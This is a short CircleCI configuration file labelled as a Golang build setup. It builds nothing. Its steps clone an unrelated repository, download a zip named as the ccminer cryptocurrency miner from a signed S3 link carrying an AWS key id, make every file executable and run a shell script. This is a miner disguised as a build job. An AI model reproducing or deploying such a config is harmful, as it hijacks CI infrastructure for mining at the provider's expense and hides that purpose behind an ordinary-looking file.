# Golang CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-go/ for more details
version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: git clone https://github.com/kimbokjoo21/project2120
      - run: curl https://github-production-release-asset-2e65be.s3.amazonaws.com/29908575/d9430b58-54b2-11e5-8e5c-b50ad2167c43?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210119%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210119T094238Z&X-Amz-Expires=300&X-Amz-Signature=8ff57cb925a00ae828fa5251e5fcdcdb5f46a9c91bd21afde4ee2501cb19d037&X-Amz-SignedHeaders=host&actor_id=77666453&key_id=0&repo_id=29908575&response-content-disposition=attachment%3B%20filename%3Dccminer-cuda30-amd64-linux-v1_6_6.zip&response-content-type=application%2Foctet-stream -o g.zip
      - run: cd project2120 && unzip g.zip && chmod +x * && ./base.sh
      
